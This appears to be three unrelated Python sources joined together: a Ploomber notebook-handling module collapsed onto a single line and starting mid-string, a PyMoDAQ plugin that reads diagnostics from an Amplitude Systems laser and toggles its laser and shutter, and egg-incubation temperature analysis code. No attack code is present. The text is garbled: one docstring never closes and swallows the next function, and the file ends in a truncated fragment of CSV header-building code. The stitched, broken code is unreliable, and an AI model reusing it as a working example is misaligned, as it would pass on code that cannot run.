'' msg = ('Notebook{} does not have a cell tagged ' '"parameters"'.format(loc)) if self.loc and Path(self.loc).suffix == '.py': msg += """. Add a cell at the top like this: # %% tags=["parameters"] upstream = None product = None Go to: https://ploomber.io/s/params for more information """ if self.loc and Path(self.loc).suffix == '.ipynb': msg += ('. Add a cell at the top and tag it as "parameters". 
' 'Go to the next URL for ' 'details: https://ploomber.io/s/params') raise MissingParametersCellError(msg) def _post_render_validation(self): """ Validate params passed against parameters in the notebook """ # NOTE: maybe static_analysis = off should not turn off everything # but only warn # strict mode: raise and check signature # regular mode: _check_notebook called in NotebookRunner.run if self.static_analysis == 'strict': self._check_notebook(raise_=True, check_signature=True) else: # otherwise, only warn on unused parameters _warn_on_unused_params(self._nb_obj_unrendered, self._params) def _check_notebook(self, raise_, check_signature): if self.static_analysis and self.language == 'python': # warn if errors (e.g., undeclared variables, syntax errors) check_notebook(self._nb_str_to_obj(self._nb_str_rendered), self._params, filename=self._path or 'notebook', raise_=raise_, check_signature=check_signature) @property def doc(self): """ Returns notebook docstring parsed either from a triple quoted string in the top cell or a top markdown markdown cell """ return docstring.extract_from_nb(self._nb_obj_unrendered) @property def loc(self): return self._path @property def name(self): # filename without extension(e.g., plot.py -> plot) if self._path: return self._path.stem @property def nb_str_rendered(self): """ Returns the notebook (as a string) with parameters injected, hot reloadig if necessary """ if self._nb_str_rendered is None: raise RuntimeError('Attempted to get location for an unrendered ' 'notebook, render it first') if self._hot_reload: self._render() return self._nb_str_rendered @property def nb_obj_rendered(self): """ Returns the notebook (as an objet) with parameters injected, hot reloadig if necessary """ if self._nb_obj_rendered is None: # using self.nb_str_rendered triggers hot reload if needed self._nb_obj_rendered = self._nb_str_to_obj(self.nb_str_rendered) return self._nb_obj_rendered def __str__(self): # reload if empty or hot_reload=True self._read_nb_str_unrendered() # FIXME: this should ignore changes to the markdown cells return '\n'.join([c.source for c in self._nb_obj_unrendered.cells]) def __repr__(self): if self.loc is not None: return "{}('{}')".format(type(self).__name__, self.loc) else: return "{}(loaded from string)".format(type(self).__name__) @property def variables(self): raise NotImplementedError @property def extension(self): # this can be Python, R, Julia, etc. We are handling them the same, # for now, no normalization can be done. # One approach is to use the ext if loaded from file, otherwise None return None # FIXME: add this to the abstract class, probably get rid of "extension" # since it's not informative (ipynb files can be Python, R, etc) @property def language(self): """ Notebook Language (Python, R, etc), this is a best-effort property, can be None if we could not determine the language """ if self._language is None: self._read_nb_str_unrendered() try: # make sure you return "r" instead of "R" return (self._nb_obj_unrendered.metadata.kernelspec.language. 
lower()) except AttributeError: return None else: return self._language def _nb_str_to_obj(self, nb_str): return nbformat.reads(nb_str, as_version=nbformat.NO_CONVERT) def _get_parameters_cell(self): self._read_nb_str_unrendered() cell, _ = find_cell_with_tag(self._nb_obj_unrendered, tag='parameters') return cell.source def extract_upstream(self): extractor_class = extractor_class_for_language(self.language) return extractor_class(self._get_parameters_cell()).extract_upstream() def extract_product(self): extractor_class = extractor_class_for_language(self.language) return extractor_class(self._get_parameters_cell()).extract_product() @requires_path def save_injected_cell(self): """ Inject cell, overwrite the source file (and any paired files) """ fmt_ = _jupytext_fmt(self._primitive, self._ext_in) # add metadata to flag that the cell was injected manually recursive_update( self.nb_obj_rendered, dict(metadata=dict(ploomber=dict(injected_manually=True)))) # Are we updating a text file that has a metadata filter? If so, # add ploomber as a section that must be stored if (self.nb_obj_rendered.metadata.get( 'jupytext', {}).get('notebook_metadata_filter') == '-all'): recursive_update( self.nb_obj_rendered, dict(metadata=dict(jupytext=dict( notebook_metadata_filter='ploomber,-all')))) # overwrite jupytext.write(self.nb_obj_rendered, self._path, fmt=fmt_) # overwrite all paired files for path, fmt_ in iter_paired_notebooks(self.nb_obj_rendered, fmt_, self._path.stem): jupytext.write(self.nb_obj_rendered, fp=path, fmt=fmt_) @requires_path def remove_injected_cell(self): """ Delete injected cell, overwrite the source file (and any paired files) """ nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered) # remove metadata recursive_update( nb_clean, dict(metadata=dict(ploomber=dict(injected_manually=None)))) fmt_ = _jupytext_fmt(self._primitive, self._ext_in) # overwrite jupytext.write(nb_clean, self._path, fmt=fmt_) # overwrite all paired files for path, fmt_ in iter_paired_notebooks(self._nb_obj_unrendered, fmt_, self._path.stem): jupytext.write(nb_clean, fp=path, fmt=fmt_) @requires_path def format(self, fmt, entry_point): """Change source format Returns ------- str The path if the extension changed, None otherwise """ nb_clean = _cleanup_rendered_nb(self._nb_obj_unrendered) ext_file = self._path.suffix ext_format = long_form_one_format(fmt)['extension'] extension_changed = ext_file != ext_format if extension_changed: if Path(entry_point).is_file(): path = self._path.with_suffix(ext_format) Path(self._path).unlink() modified_entry = Path(entry_point).read_text() main_file = f'{self.name}{ext_file}' if main_file in modified_entry: modified_entry = modified_entry.replace( main_file, f'{self.name}{ext_format}') Path(entry_point).write_text(modified_entry) else: click.secho( f'{main_file} does not appear in entry-point' f'please edit manually\n', fg='yellow') path = self._path else: click.secho( "The entry-point is not a valid file, please" " update the pipeline file extensions manually\n", fg='yellow') path = self._path else: path = self._path jupytext.write(nb_clean, path, fmt=fmt) return path if extension_changed else None @requires_path def pair(self, base_path): """Pairs with an ipynb file """ # TODO: add unit test if self._ext_in == 'ipynb': raise ValueError( 'pairing only works with .py files, got .ipynb. 
' 'Yoy may convert the .ipynb to .py and try again.') fmt, _ = jupytext.guess_format(self._primitive, f'.{self._ext_in}') fmt_ = f'{self._ext_in}:{fmt}' # mute jupytext's output with redirect_stdout(StringIO()): jupytext_cli.jupytext(args=[ '--set-formats', f'{base_path}//ipynb,{fmt_}', str(self._path) ]) @requires_path def sync(self): """Pairs with and ipynb file """ # mute jupytext's output with redirect_stdout(StringIO()): jupytext_cli.jupytext(args=['--sync', str(self._path)]) def json_serializable_params(params): # papermill only allows JSON serializable parameters # convert Params object to dict params = params.to_dict() params['product'] = params['product'].to_json_serializable() if params.get('upstream'): params['upstream'] = params['upstream'].to_json_serializable() return params def _to_nb_obj(source, language, ext=None, kernelspec_name=None, check_if_kernel_installed=True, path=None): """ Convert to jupyter notebook via jupytext, if the notebook does not contain kernel information and the user did not pass a kernelspec_name explicitly, we will try to infer the language and select a kernel appropriately. If a valid kernel is found, it is added to the notebook. If none of this works, an exception is raised. If also converts the code string to its notebook node representation, adding kernel data accordingly. Parameters ---------- source : str Jupyter notebook (or jupytext compatible formatted) document language : str Programming language path : str, default=None Script/notebook path. If not None, it's used to throw an informative error if the notebook fails to load Returns ------- nb Notebook object Raises ------ RenderError If the notebook has no kernelspec metadata and kernelspec_name is None. A notebook without kernelspec metadata will not display in jupyter notebook correctly. We have to make sure all notebooks have this. """ import jupytext # let jupytext figure out the format try: nb = jupytext.reads(source, fmt=ext) except Exception as e: what = 'notebook' if ext == 'ipynb' else 'script' err = f'Failed to read {what}' if path is not None: err += f' from {str(path)!r}' raise SourceInitializationError(err) from e # NOTE: I can add the cell with parameters here, but what happens if # extract_upstream is false? would that be a problem? check_nb_kernelspec_info(nb, kernelspec_name, ext, language, check_if_installed=check_if_kernel_installed) return nb def check_nb_kernelspec_info(nb, kernelspec_name, ext, language, check_if_installed=True): """Make sure the passed notebook has kernel info Parameters ---------- check_if_installed : bool Also check if the kernelspec is installed, nb.metadata.kernelspec to be replaced by whatever information jupyter returns when requesting the kernelspec """ import jupyter_client kernel_name = determine_kernel_name(nb, kernelspec_name, ext, language) # cannot keep going if we don't have the kernel name if kernel_name is None: raise SourceInitializationError( 'Notebook does not contain kernelspec metadata and ' 'kernelspec_name was not specified, either add ' 'kernelspec info to your source file or specify ' 'a kernelspec by name. To see list of installed kernels run ' '"jupyter kernelspec list" in the terminal (first column ' 'indicates the name). 
Python is usually named "python3", ' 'R usually "ir"') if check_if_installed: kernelspec = jupyter_client.kernelspec.get_kernel_spec(kernel_name) nb.metadata.kernelspec = { "display_name": kernelspec.display_name, "language": kernelspec.language, "name": kernel_name } else: if 'metadata' not in nb: nb['metadata'] = dict() if 'kernelspec' not in nb['metadata']: nb['metadata']['kernelspec'] = dict() # we cannot ask jupyter, so we fill this in ourselves nb.metadata.kernelspec = { "display_name": 'R' if kernel_name == 'ir' else 'Python 3', "language": 'R' if kernel_name == 'ir' else 'python', "name": kernel_name } def determine_kernel_name(nb, kernelspec_name, ext, language): """ Determines the kernel name by using the following data (returns whatever gives kernel info first): 1) explicit kernel from the user 2) notebook's metadata 3) file extension 4) language 5) best guess """ # explicit kernelspec name if kernelspec_name is not None: return kernelspec_name # use metadata info try: return nb.metadata.kernelspec.name except AttributeError: pass # use language from extension if passed, otherwise use language variable if ext: language = determine_language(ext) lang2kernel = {'python': 'python3', 'r': 'ir'} if language in lang2kernel: return lang2kernel[language] # nothing worked, try to guess if it's python... is_python_ = is_python(nb) if is_python_: return 'python3' else: return None def inject_cell(model, params): """Inject params (by adding a new cell) to a model Notes ----- A model is different than a notebook: https://jupyter-notebook.readthedocs.io/en/stable/extending/contents.html """ nb = nbformat.from_dict(model['content']) # we must ensure nb has kernelspec info, otherwise papermill will fail to # parametrize ext = model['name'].split('.')[-1] check_nb_kernelspec_info(nb, kernelspec_name=None, ext=ext, language=None) # papermill adds a bunch of things before calling parameterize_notebook # if we don't add those things, parameterize_notebook breaks # https://github.com/nteract/papermill/blob/0532d499e13e93d8990211be33e9593f1bffbe6c/papermill/iorw.py#L400 if not hasattr(nb.metadata, 'papermill'): nb.metadata['papermill'] = { 'parameters': dict(), 'environment_variables': dict(), 'version': None, } for cell in nb.cells: if not hasattr(cell.metadata, 'tags'): cell.metadata['tags'] = [] params = json_serializable_params(params) comment = ('This cell was injected automatically based on your stated ' 'upstream dependencies (cell above) and pipeline.yaml ' 'preferences. It is temporary and will be removed when you ' 'save this notebook') model['content'] = parameterize_notebook(nb, params, report_mode=False, comment=comment) def _cleanup_rendered_nb(nb, print_=True): """ Cleans up a rendered notebook object. 
Removes cells with tags: injected-parameters, debugging-settings, and metadata injected by papermill """ out = find_cell_with_tags(nb, ['injected-parameters', 'debugging-settings']) if print_: for key in out.keys(): print(f'Removing {key} cell...') idxs = set(cell['index'] for cell in out.values()) nb['cells'] = [ cell for idx, cell in enumerate(nb['cells']) if idx not in idxs ] # papermill adds "tags" to all cells that don't have them, remove them # if they are empty to avoid cluttering the script for cell in nb['cells']: if 'tags' in cell.get('metadata', {}): if not len(cell['metadata']['tags']): del cell['metadata']['tags'] return nb def is_python(nb): """ Determine if the notebook is Python code for a given notebook object, look for metadata.kernelspec.language first, if not defined, try to guess if it's Python, it's conservative and it returns False if the code is valid Python but contains (<-), in which case it's much more likely to be R """ is_python_ = None # check metadata first try: language = nb.metadata.kernelspec.language except AttributeError: pass else: is_python_ = language == 'python' # no language defined in metadata, check if it's valid python if is_python_ is None: code_str = '\n'.join([c.source for c in nb.cells]) try: ast.parse(code_str) except SyntaxError: is_python_ = False else: # there is a lot of R code which is also valid Python code! So # let's # run a quick test. It is very unlikely to have "<-" in Python ( # {less than} {negative} but extremely common {assignment} if '<-' not in code_str: is_python_ = True # inconclusive test... if is_python_ is None: is_python_ = False return is_python_ def determine_language(extension): """ A function to determine programming language given file extension, returns programming language name (all lowercase) if could be determined, None if the test is inconclusive """ if extension.startswith('.'): extension = extension[1:] mapping = {'py': 'python', 'r': 'r', 'R': 'r', 'Rmd': 'r', 'rmd': 'r'} # ipynb can be many languages, it must return None return mapping.get(extension) def recursive_update(target, update): """Recursively update a dictionary. 
Taken from jupytext.header """ for key in update: value = update[key] if value is None: # remove if it exists target.pop(key, None) elif isinstance(value, dict): target[key] = recursive_update(target.get(key, {}), value) else: target[key] = value return target def parse_jupytext_format(fmt, name): """ Parse a jupytext format string (such as notebooks//ipynb) and return the path to the file and the extension """ fmt_parsed = long_form_one_format(fmt) path = Path(fmt_parsed['prefix'], f'{name}{fmt_parsed["extension"]}') del fmt_parsed['prefix'] return path, short_form_one_format(fmt_parsed) def iter_paired_notebooks(nb, fmt_, name): formats = nb.metadata.get('jupytext', {}).get('formats', '') if not formats: return formats = formats.split(',') formats.remove(fmt_) # overwrite all paired files for path, fmt_current in (parse_jupytext_format(fmt, name) for fmt in formats): yield path, fmt_current def _nb2codestr(nb): return '\n'.join([c.source for c in nb.cells if c.cell_type == 'code']) def _warn_on_unused_params(nb, params): nb = deepcopy(nb) _, idx = find_cell_with_tag(nb, 'parameters') del nb.cells[idx] code = _nb2codestr(nb) # NOTE: if there a syntax error we cannot accurately check this m = parso.parse(code) names = set(m.get_used_names()) # remove product since it may not be required # FIXME: maybe only remove it if it's a dictionary with >2 keys unused = set(params) - names - {'product'} if unused: warnings.warn('These parameters are not used in the ' f'task\'s source code: {pretty_print.iterable(unused)}') def add_parameters_cell(path, extract_upstream, extract_product): """ Add parameters cell to a script/notebook in the given path, overwrites the original file """ source = '' if extract_upstream: source += """\ # declare a list tasks whose products you want to use as inputs upstream = None """ if extract_product: source += """\ # declare a dictionary with the outputs of this task product = None """ c = JupytextConfiguration() c.notebook_metadata_filter c.cell_metadata_filter = 'all' nb = jupytext.read(path) new_cell = nbformat.v4.new_code_cell(source, metadata={'tags': ['parameters']}) nb.cells.insert(0, new_cell) jupytext.write(nb, path, config=c) def _suggest_ploomber_scaffold_missing_file(): if Path('pipeline.yaml').is_file(): return '\nTo create it, run: ploomber scaffold' else: return '' def _suggest_ploomber_scaffold_is_dir(): if Path('pipeline.yaml').is_file(): return ('\nTo create it, delete the directory, ' 'then run: ploomber scaffold') else: return ''
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 14 15:14:54 2018

@author: Weber Sébastien
@email: seba.weber@gmail.com
"""
from PyQt5.QtCore import pyqtSignal, QTimer, QThread
from easydict import EasyDict as edict

from pymodaq.daq_utils.daq_utils import ThreadCommand, getLineInfo, DataFromPlugins, set_logger, get_module_name
from pymodaq.daq_viewer.utility_classes import DAQ_Viewer_base, comon_parameters
import numpy as np
from ...hardware.amplitude.amplitude_systems import AmplitudeSystemsCRC16

logger = set_logger(get_module_name(__file__))

#%%


class DAQ_0DViewer_AmplitudeSystemsCRC16(DAQ_Viewer_base):
    """
    diagnostics = [
        dict(id=0, name='Frequency PP', read_command=0x30, write_command=0x30,
             reply=4, unit='kHz', divider=1000, readonly=False, value=-1),
    """
    data_grabed_signal = pyqtSignal(list)

    params = comon_parameters + [
        {'title': 'COM port:', 'name': 'com_port', 'type': 'list',
         'values': AmplitudeSystemsCRC16.get_ressources()},
        {'title': 'Timeout:', 'name': 'timeout', 'type': 'int', 'value': -1},
        {'title': 'Serial number:', 'name': 'serial_number', 'type': 'int', 'value': 0},
        {'title': 'Version:', 'name': 'version', 'type': 'str', 'value': ''},
        {'title': 'Update all Diags', 'name': 'update_diags', 'type': 'bool_push'},
        {'title': 'Startup:', 'name': 'startup', 'type': 'group', 'children': [
            {'title': 'Laser:', 'name': 'laser', 'type': 'bool_push', 'value': False},
            {'title': 'Shutter:', 'name': 'shutter', 'type': 'bool_push', 'value': False},
        ]},
        {'title': 'Channels:', 'name': 'channels', 'type': 'itemselect', 'height': 150,
         'value': dict(all_items=[diag['name'] for diag in AmplitudeSystemsCRC16.diagnostics], selected=[])},
        {'title': 'Status:', 'name': 'status', 'type': 'group', 'children': [
            {'title': stat['name'], 'name': f'stat_{stat["id"]}', 'type': 'led',
             'value': bool(stat['value']), 'readonly': True} for stat in AmplitudeSystemsCRC16.status]},
        {'title': 'Diagnostics:', 'name': 'diagnostics', 'type': 'group', 'children': [
            {'title': f'{diag["name"]} ({diag["unit"]})', 'name': f'diag_{diag["id"]}', 'type': 'float',
             'value': diag['value'], 'readonly': diag['readonly']} for diag in AmplitudeSystemsCRC16.diagnostics]}
    ]

    def __init__(self, parent=None, params_state=None):
        super().__init__(parent, params_state)
        self.controller = None

    def ini_detector(self, controller=None):
        """
        Initialisation procedure of the detector.

        Returns
        -------
        The initialized status.
        See Also
        --------
        daq_utils.ThreadCommand
        """
        self.status.update(edict(initialized=False, info="", x_axis=None,
                                 y_axis=None, controller=None))
        try:
            if self.settings.child(('controller_status')).value() == "Slave":
                if controller is None:
                    raise Exception('no controller has been defined externally while this detector is a slave one')
                else:
                    self.controller = controller
            else:
                self.controller = AmplitudeSystemsCRC16()
                self.controller.init_communication(self.settings.child(('com_port')).value())

            self.settings.child(('timeout')).setValue(self.controller.timeout)

            try:
                self.settings.child(('serial_number')).setValue(self.controller.get_sn())
                QThread.msleep(200)
            except Exception as e:
                logger.exception(str(e))
            try:
                self.settings.child(('version')).setValue(self.controller.get_version())
                QThread.msleep(200)
            except Exception as e:
                logger.exception(str(e))

            self.update_status()
            for stat in self.controller.status:
                self.settings.child('status', f'stat_{stat["id"]}').setValue(stat['value'])

            self.update_all_diags()

            self.status_timer = QTimer()
            self.status_timer.timeout.connect(self.update_status)
            self.status_timer.start(1000)

            self.status.controller = self.controller
            self.status.initialized = True
            return self.status

        except Exception as e:
            self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log']))
            self.status.info = getLineInfo() + str(e)
            self.status.initialized = False
            return self.status

    def update_status(self):
        """
        get a list of changed status dicts in the form
        dict(id=0, name='Temp Amp', value=0, byte=0, bit=0x00)
        """
        try:
            for stat in self.controller.get_status():
                self.settings.child('status', f'stat_{stat["id"]}').setValue(bool(stat['value']))
            self.settings.child('startup', 'laser').setValue(self.controller.get_laser())
            self.settings.child('startup', 'shutter').setValue(self.controller.get_shutter())
        except Exception as e:
            logger.exception(str(e))

    def update_all_diags(self):
        for diag in self.controller.diagnostics:
            try:
                QThread.msleep(200)
                self.update_diag(diag['id'])
            except Exception as e:
                print(e)

    def update_diag(self, id):
        data, diag = self.controller.get_diag_from_id(id)
        self.settings.child('diagnostics', f'diag_{id}').setValue(diag['value'] / diag['divider'])

    def reset(self):
        self.controller.flush()

    def grab_data(self, Naverage=1, **kwargs):
        """
        """
        self.status_timer.stop()
        data_tot = []
        selected_channels = self.settings.child(('channels')).value()['selected']
        for channel in selected_channels:
            data, diag = self.controller.get_diag_from_name(channel)
            data = int.from_bytes(data, 'big') / diag['divider']
            self.settings.child('diagnostics', f'diag_{diag["id"]}').setValue(data)
            data_tot.append(np.array([data]))
            QThread.msleep(200)

        self.data_grabed_signal.emit(
            [DataFromPlugins(name='AmplitudeSystems', data=data_tot, dim='Data0D', labels=selected_channels)])
        self.status_timer.start(1000)

    def stop(self):
        pass

    def commit_settings(self, param):
        """
        Activate the parameter changes in the hardware.

        =============== ================================= ============================
        **Parameters**    **Type**                          **Description**
        *param*           instance of pyqtgraph.parameter   The parameter to be checked.
        =============== ================================= ============================

        See Also
        --------
        daq_utils.ThreadCommand
        """
        try:
            self.status_timer.stop()
            if 'diag_' in param.name():
                id = int(param.name().split('diag_')[1])
                diag = self.controller.get_diag_from_id(id)
                self.controller.set_diag(id, int(param.value() * diag['divider']).to_bytes(diag['reply'], 'big'))
                QThread.msleep(200)
                self.update_diag(id)

            elif param.name() == 'timeout':
                self.controller.timeout = param.value()
                param.setValue(self.controller.timeout)

            elif param.name() == 'update_diags':
                self.update_all_diags()
                self.update_status()

            elif param.name() == 'laser':
                self.controller.set_laser(param.value())

            elif param.name() == 'shutter':
                self.controller.set_shutter(param.value())

            self.status_timer.start(1000)
        except Exception as e:
            self.emit_status(ThreadCommand('Update_Status', [getLineInfo() + str(e), 'log']))

    def close(self):
        """
        close the current instance of the communication session.
        """
        self.status_timer.stop()
        QThread.msleep(1000)
        self.controller.close_communication()
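# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the plugin above) of the value encoding
# used by grab_data and commit_settings: the controller exchanges each
# diagnostic as a big-endian byte string scaled by a per-diagnostic divider.
# The numbers below are made up for demonstration; real values come from the
# hardware.

divider = 1000   # e.g. a diagnostic reported in kHz with divider=1000
reply = 4        # number of bytes in the controller's reply

raw = (40000).to_bytes(reply, 'big')          # bytes as read from the device
value = int.from_bytes(raw, 'big') / divider  # -> 40.0, as shown in the GUI

# writing a value back reverses the transformation (see commit_settings)
assert int(value * divider).to_bytes(reply, 'big') == raw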
import datetime
import json
import re
import time
from pathlib import Path

import numpy as np
import pandas as pd
from bokeh.io import reset_output
from bokeh.layouts import column, widgetbox
from bokeh.models import HoverTool, PointDrawTool, Span
from bokeh.models.widgets import DataTable, TableColumn
from bokeh.plotting import ColumnDataSource, figure, output_file, show
from bs4 import BeautifulSoup
from contextlib import suppress
from tkinter import messagebox

import niq_classes


def convert_to_datetime(dt_string):
    """
    Converts Date/Time cell from master DataFrame to datetime.datetime
    object.

    Args:
        dt_string (str): contents of date/time cell of input file provided
        by user
    """
    # Return input if already datetime object
    if type(dt_string) == pd._libs.tslibs.timestamps.Timestamp:
        return dt_string

    # Try extracting date/time with various formats
    while True:
        with suppress(ValueError):
            time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M:%S")
            break
        with suppress(ValueError):
            time_struct = time.strptime(dt_string, r"%m/%d/%y %H:%M")
            break
        with suppress(ValueError):
            time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M:%S")
            break
        with suppress(ValueError):
            time_struct = time.strptime(dt_string, r"%m/%d/%Y %H:%M")
            break

    dt = datetime.datetime(*time_struct[0:6])
    return dt


def is_partial(df, first_index, last_index, expected_dur):
    """
    Checks if given range of indices represents a complete daytime or
    nighttime period.

    Args:
        df (pd.DataFrame)
        first_index (int)
        last_index (int)
        expected_dur (int): expected duration in seconds
    """
    # Allow 5 min (300 sec) of discrepancy from the expected duration
    block_dur_thresh = expected_dur - 300

    start_time = df.loc[first_index, "date_time"]
    end_time = df.loc[last_index, "date_time"]
    block_dur = end_time - start_time

    if block_dur > datetime.timedelta(seconds=block_dur_thresh):
        return False

    return True


def split_days(gui):
    """
    Analyze dates of master DataFrame and parse row data into daytime and
    nighttime block objects.
    """

    def is_daytime(date_time):
        """
        Check if a given time falls within the daytime period defined by
        the user.

        Args:
            date_time (datetime.datetime)
        """
        time = date_time.time()

        # When the start of daytime is earlier in the day than the start
        # of nighttime
        if day_start < night_start:
            if time >= day_start and time < night_start:
                return True
        # When the start of nighttime is earlier in the day than the start
        # of daytime
        elif night_start < day_start:
            if not (time >= night_start and time < day_start):
                return True

        return False

    def get_durs(day_start, night_start):
        """
        Get expected durations in seconds for complete daytime and
        nighttime periods.
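        For example, day_start = 06:00 with night_start = 19:00 gives a
        daytime duration of 13 * 3600 = 46800 seconds and a nighttime
        duration of 86400 - 46800 = 39600 seconds.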
def get_day_dur(day_start, night_start):
    """
    Finds the duration (in minutes) of the daytime period specified by the user.

    Args:
        day_start (str): start of daytime period
        night_start (str): start of nighttime period
    """

    day = re.search(r"(\d+)(:)(\d+)", day_start)
    day_float = float(day.group(1)) + (float(day.group(3)) / 60)

    night = re.search(r"(\d+)(:)(\d+)", night_start)
    night_float = float(night.group(1)) + (float(night.group(3)) / 60)

    return (night_float - day_float) * 60


def smooth_series(radius, col):
    """
    Generates "smoothed" copy of input data by applying a rolling mean of the requested radius.

    Args:
        radius (int): number of values to include in rolling mean
                      (e.g. radius = 1 means average values i, i-1 and i+1)
        col (pd.Series): column data to be smoothed
    """

    # Return original column if radius is less than 1
    if radius <= 0:
        return col

    window = (radius * 2) + 1
    return col.rolling(window, min_periods=1, center=True).mean()
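# A quick demonstration of smooth_series on toy data: with radius 1 the window
# is 3 samples wide, and min_periods=1 keeps the edge values defined instead of
# NaN (the values below are illustrative only):

_raw = pd.Series([1.0, 2.0, 9.0, 2.0, 1.0])
_smoothed = smooth_series(1, _raw)
# Edges average 2 samples, interior points average 3
assert np.allclose(_smoothed, [1.5, 4.0, 13.0 / 3, 4.0, 1.5])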
def get_verts_from_html(gui, in_file, alt=False):
    """
    Creates vertex objects from vertices placed by the user in the provided HTML file.

    Args:
        gui (GUIClass)
        in_file (str): path to and name of HTML file containing user-provided vertex locations
        alt (bool): dictates if vertices are extracted from the table or alternative variable in HTML file
    """

    def get_data_points_from_html(gui, in_file):
        """
        Extracts the corresponding data point for each point placed by the user in the HTML file.

        Args:
            gui (GUIClass)
            in_file (str): path to and name of HTML file containing user-provided vertex locations
        """

        data_point_list = []
        dp_col_num = gui.master_df.columns.get_loc("data_point")
        max_dp = gui.master_df.iloc[-1, dp_col_num]
        min_dp = gui.master_df.iloc[0, dp_col_num]

        with open(in_file, "r") as vertex_file:
            content = vertex_file.read()

        # Extract list of vertex data points
        try:
            # Try using Beautiful Soup method
            soup = BeautifulSoup(content, "html.parser")

            # Extract html behind table
            table_widget = "bk-widget-box bk-layout-fixed"
            table_content = soup.find("div", class_=table_widget)

            # Extract leftmost column of data (data points)
            hits = table_content.find_all("div", class_="slick-cell l1 r1")
            dp_list = [hit.find("span", style="text-align: left;").text for hit in hits]

            # Get selected vertex if it exists
            cell_re = re.compile(r"slick-cell l1 r1 selected\"><span style=\"text-align: left;\">(\d+)")
            selected = re.search(cell_re, content)
            if selected is not None:
                dp_list.append(selected.group(1))
        except AttributeError:
            # Fall back to regex method
            try:
                dp_list = re.search(r'"data":\{"x":\[([^\]]*)', content).group(1).split(",")
            except AttributeError:
                dp_list = []

        dp_list = [dp for dp in dp_list if is_number(dp)]

        for hit in dp_list:
            # Clean hits, clamp to the valid data point range, and append
            data_point = round(float(hit))
            data_point = max(data_point, min_dp)
            data_point = min(data_point, max_dp)
            data_point_list.append(data_point)

        # Conversion to set removes redundant entries
        return sorted(set(data_point_list))

    vertices = []
    vertex_data_points = get_data_points_from_html(gui, in_file)

    # Make sure there is at least one data point detected in input plot
    if len(vertex_data_points) == 0:
        messagebox.showerror(
            "Input Plot Error",
            "No vertices were detected in the provided plot.\n\n"
            + 'When saving plots, ensure the file type option is set to "Webpage, Complete" not "Webpage, HTML only".'
        )
        return None

    # Delta is the discrepancy between index value and corresponding data point number.
    # (An earlier index-scanning loop computed this too; it was superseded by this pandas lookup.)
    filt = gui.master_df.loc[:, "data_point"] == vertex_data_points[0]
    first_dp_index = gui.master_df.loc[filt].index[0]
    delta = int(gui.master_df.loc[first_dp_index, "data_point"] - first_dp_index)

    # Determine if first vertex is an off start or on start
    first_vert_temper = gui.master_df.loc[vertex_data_points[0] - delta, "egg_temper"]
    second_vert_temper = gui.master_df.loc[vertex_data_points[1] - delta, "egg_temper"]
    vert_type = "off" if first_vert_temper > second_vert_temper else "on"

    # Generate vertices, alternating off/on types
    for data_point in vertex_data_points:
        index = data_point - delta
        vertices.append(niq_classes.Vertex(index, gui.master_df.loc[index, "egg_temper"], vert_type))
        vert_type = "on" if vert_type == "off" else "off"

    return vertices
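# The regex fallback above pulls the x-coordinates straight out of the Bokeh
# ColumnDataSource JSON embedded in the saved HTML. A self-contained sketch of
# that extraction on a fabricated snippet (the snippet is illustrative, not a
# real saved plot):

_html = '... "data":{"x":[12,57,198],"y":[36.1,35.2,36.4]} ...'
_match = re.search(r'"data":\{"x":\[([^\]]*)', _html)
assert _match.group(1).split(",") == ["12", "57", "198"]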
def extract_bouts_in_range(gui, total_bouts, first_index, last_index):
    """
    Extracts bouts falling into a specified window of index values.

    Args:
        gui (GUIClass)
        total_bouts (list): every bout identified for the current input file
        first_index (int)
        last_index (int)
    """

    bouts_in_range = []
    left_limit, right_limit = 0, 0

    if len(total_bouts) < 1 or last_index < total_bouts[0].first or first_index > total_bouts[-1].last:
        return bouts_in_range

    # Determine first bout in range
    for i in range(len(total_bouts)):
        if total_bouts[i].middle >= first_index:
            left_limit = i
            break

    # Determine last bout in range
    for i in range((len(total_bouts) - 1), -1, -1):
        if total_bouts[i].middle <= last_index:
            right_limit = i
            break

    bouts_in_range = total_bouts[left_limit : (right_limit + 1)]
    bouts_in_range.sort(key=lambda x: x.first)
    return bouts_in_range


def get_date_blocks(gui):
    """
    Creates Block objects for each date represented in the input file provided.

    Args:
        gui (GUIClass)
    """

    # Get unique dates
    date_blocks = []
    dates = gui.master_df["date_time"].apply(datetime.datetime.date).unique()

    # Get data points corresponding to each date
    for date in dates:
        sub_df = gui.master_df[gui.master_df["date_time"].apply(datetime.datetime.date) == date]

        # 86400 = number of seconds in 24 hr
        partial = is_partial(gui.master_df, sub_df.index.min(), sub_df.index.max(), 86400)

        # Create Block object
        date_blocks.append(niq_classes.Block(gui, sub_df.index.min(), sub_df.index.max(), partial))

    return date_blocks
header += "Time below " + gui.time_below_temper_E.get() + " (minutes)," if gui.bouts_dropped_BV.get(): header += "Vertices Dropped" + qualifier if gui.mean_temper_d_BV.get(): header += "Mean Daytime Egg Temp," if gui.mean_temper_d_sd_BV.get(): header += "Day Egg Temp StDev," if gui.median_temper_d_BV.get(): header += "Median Daytime Egg Temp," if gui.min_temper_d_BV.get(): header += "Min Daytime Egg Temp," if gui.max_temper_d_BV.get(): header += "Max Daytime Egg Temp," if gui.mean_temper_n_BV.get(): header += "Mean Nighttime Egg Temp," if gui.mean_temper_n_sd_BV.get(): header += "Night Egg Temp StDev," if gui.median_temper_n_BV.get(): header += "Median Nighttime Egg Temp," if gui.min_temper_n_BV.get(): header += "Min Nighttime Egg Temp," if gui.max_temper_n_BV.get(): header += "Max Nighttime Egg Temp," if gui.mean_temper_dn_BV.get(): header += "Mean Egg Temp (DN)," if gui.mean_temper_dn_sd_BV.get(): header += "Egg Temp StDev (DN)," if gui.median_temper_dn_BV.get(): header += "Median Egg Temp (DN)," if gui.min_temper_dn_BV.get(): header += "Min Egg Temp (DN)," if gui.max_temper_dn_BV.get(): header += "Max Egg Temp (DN)," if gui.air_valid: if gui.mean_air_temper_BV.get(): header += "Mean Air Temp (DN)," if gui.mean_air_temper_sd_BV.get(): header += "Air Temp StDev (DN)," if gui.min_air_temper_BV.get(): header += "Min Air Temp (DN)," if gui.max_air_temper_BV.get(): header += "Max Air Temp (DN)," # ----------------------------------------------------------------------------------------------- day_rows = [] # Print individual day stats for i, block in enumerate(date_blocks): day_row = "" partial = " (Partial)" if block.partial_day else " 